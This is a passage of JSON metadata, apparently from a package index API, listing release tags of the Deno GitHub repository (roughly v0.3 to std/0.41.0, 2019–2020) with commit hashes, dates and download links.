denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f